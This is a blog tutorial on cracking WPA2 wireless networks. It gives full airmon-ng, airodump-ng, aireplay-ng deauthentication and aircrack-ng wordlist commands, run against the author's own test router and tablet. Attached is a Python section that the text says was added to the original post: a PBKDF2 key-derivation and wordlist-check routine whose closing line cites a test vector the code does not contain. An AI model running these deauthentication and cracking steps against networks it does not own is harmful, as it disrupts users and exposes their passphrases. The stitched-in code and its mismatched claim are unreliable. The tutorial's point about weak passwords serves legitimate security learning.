Wireless Hacking – WPA2

I’m pretty sure there’s a million blog posts and videos online about how to hack a wireless access point with WPA2 encryption. I guess this is more of a reference point for me to go back to whenever I need it as much as it may help others.

WPA2 is about as secure as the password you use. If your passcode is stored in any wordlist, you are going to get owned. My test router did not log this attack and my Android tablet (client) simply disconnected and reconnected quicker than I could measure.

The kit

Wireless card: ALFA AWUS036H 5db
Access Point: Linksys WRT54GC

The theory

  • Identify your wireless card
  • Place the card into monitor mode
  • Identify the Access Point target and connected client(s)
  • Launch a De-Authentication attack on the client
  • Grab the WPA handshake
  • Crack the pass code using Aircrack-NG and a wordlist

The hack

First up we need to identify the wireless card. Run the command below:

airmon-ng

I know from previous identification that the ALFA card uses the rtl8187 driver, so I’ll be using wlan1 for this test. Having identified the card, the next step is to place it in monitor mode. In one command we can check for processes that interfere with monitor mode, kill them, and then put the card into monitor mode.


airmon-ng check kill && airmon-ng start wlan1

As we can see from the image below, there is a new interface called ‘wlan1mon’. There is an easier way to create a new interface for monitoring; however, I wanted to keep everything within the Aircrack-NG suite for ease of reading.

Now that we have an interface on which we can monitor wireless traffic, we can move on to identifying a target. I’ll be using the test access point from above; its SSID is ‘linksys’.

airodump-ng wlan1mon

If you run the command above you will see all the access points within range of the ALFA card. I’ll skip to the next command, where we narrow the capture to the test router to gain more information about it.

airodump-ng -c 6 --bssid 00:0F:66:86:85:3A wlan1mon

All we have done is filter on the access point’s MAC address and channel. This shows the connected clients, and it also keeps the capture file small when we write the traffic to disk later.

As you can see, we are targeting the ESSID ‘linksys’. The information we need for the next phase is the access point BSSID (MAC Address) and a MAC address of a client (Station). I’ve connected my Android tablet to the target network so that we can create some traffic and have something to attack later.

By simply unlocking the tablet, it associates with the access point once again and shows up during the monitoring phase. Now that we have this information, we can move to the next phase of the attack.

Before the next phase is run, we need to write the captured packets to a file to crack later. Adding the -w flag to the airodump command above tells it to save the traffic.

airodump-ng -c 6 --bssid 00:0F:66:86:85:3A -w hacked wlan1mon

It is important to have this running, in its own window, before issuing the next command.

In a new terminal window we run the command below to deauth the client (tablet) from the access point so that it is forced to reconnect and we capture the WPA handshake.

aireplay-ng --deauth 5 -a 00:0F:66:86:85:3A -c 38:2C:4A:37:91:13 wlan1mon

Aireplay-NG is a very powerful tool in the Aircrack suite. It has many functions that are worth investigating. For this exercise we send 5 deauth packets to the client to force it to reconnect to the wireless network.

Amazingly, before you know it, you have captured a WPA handshake in the Airodump terminal window with the confirmation shown in the window below.

This is the point where most tutorial videos neglect to tell you to keep the Airodump capture running. I spent too long troubleshooting why aircrack-ng reported that it had no WPA handshake to work with.

In another terminal window run the below command:

aircrack-ng -w rockyou.txt hacked-01.cap

For the purposes of this tutorial I set the wireless password to password123. aircrack-ng cracked the password in around 1 second. It obviously helps that it’s a super common password found in any wordlist; however, it does show how dangerous it can be to use weak passwords.

Capturing a WPA handshake is really easy, however, the strength of the password is one of the biggest defenses against this type of attack. I’m sure wordlists exist out in the wild for certain wireless routers. I’m keen to explore this method purely because this is such an interesting field.
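As an added illustration (my own code, not part of the original post or of the Aircrack-NG suite) of why the passphrase is the whole defence: WPA2-PSK derives the key from the passphrase with PBKDF2 salted by the SSID, so every wordlist guess costs 4096 HMAC-SHA1 rounds, and a table precomputed for one SSID (such as the default ‘linksys’) is useless against a network with a different name. The toy wordlist and the second SSID below are constructed sample values.

```python
import hashlib
import hmac
from typing import Iterable, Optional, Tuple

# WPA2-PSK turns the passphrase into the 256-bit Pairwise Master Key with
# PBKDF2-HMAC-SHA1, salted with the SSID, 4096 iterations (IEEE 802.11i).
# Everything else a cracker needs (SSID, nonces, MACs, MIC) is in the captured
# 4-way handshake, so the passphrase is the only unknown.
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the PMK exactly as a WPA2-PSK station or AP does."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA2-PSK passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN)


def audit_passphrase(target_pmk: bytes, ssid: str,
                     wordlist: Iterable[str]) -> Tuple[Optional[str], int]:
    """Check a network's PMK against a wordlist (e.g. a policy check on your own
    passphrase).  Returns (matching passphrase or None, PBKDF2 runs spent).
    aircrack-ng does the same per-candidate PBKDF2 work, then expands the PMK
    to the PTK and verifies the handshake MIC instead of comparing PMKs."""
    tries = 0
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if not 8 <= len(candidate) <= 63:
            continue  # cannot be a valid passphrase; skip the costly PBKDF2
        tries += 1
        if hmac.compare_digest(derive_pmk(candidate, ssid), target_pmk):
            return candidate, tries
    return None, tries


# Constructed sample data: the post's SSID and passphrase plus a toy wordlist.
SAMPLE_SSID = "linksys"
SAMPLE_WORDLIST = ["letmein", "qwerty123", "password123", "hunter2"]

if __name__ == "__main__":
    weak = derive_pmk("password123", SAMPLE_SSID)
    print("weak:", audit_passphrase(weak, SAMPLE_SSID, SAMPLE_WORDLIST))
    strong = derive_pmk("correct-horse-battery-staple-42", SAMPLE_SSID)
    print("strong:", audit_passphrase(strong, SAMPLE_SSID, SAMPLE_WORDLIST))
    # Same passphrase, different SSID, different PMK: a table precomputed for
    # the default 'linksys' SSID is useless against a renamed network.
    print(derive_pmk("password123", "linksys") != derive_pmk("password123", "MyHomeNet"))
```

The "IEEE"/"password" pair in the test is the published 802.11i test vector, so you can confirm the derivation matches the standard before trusting it on your own SSID.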

If you have any questions or improvements on this type of attack, hit me up on twitter @InfoSecPS

Thanks for reading.